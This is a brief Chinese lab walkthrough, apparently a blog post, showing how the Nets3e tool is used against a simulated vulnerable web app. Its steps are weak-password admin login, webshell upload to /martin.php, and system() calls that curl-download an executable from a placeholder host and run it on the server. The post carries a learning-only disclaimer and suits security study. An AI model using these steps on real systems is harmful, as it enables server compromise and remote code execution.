Github==>https://github.com/MartinxMax/Nets3e
注意
该实验仅供学习,请不要以身试法!
一切未经授权的渗透行为,均属于违法行为!
不要有疑问,目前版本只支持windows,到后期会更新支持linux平台的
- 鸣谢:
- Freebuf==>https://www.freebuf.com/articles/web/366693.html
漏洞环境搭建人员:
Jpkie君桑
CSDN博客
GitHub
BiliBli
(被拍的匿名运维人员):
留言:***
将模拟容易受攻击web程序,使用Nets3e v1.1.1模拟实验
弱口令进入后台
/admin/
上传webshell
webshell路径:/martin.php
测试curl命令可运行
system('curl -help');
利用CURL下载Nets3e客户端
system('curl -O http://xxxx.com/Nets3eClient_release.exe');
在对方服务器运行Nets3e客户端
system('Nets3eClient_release.exe');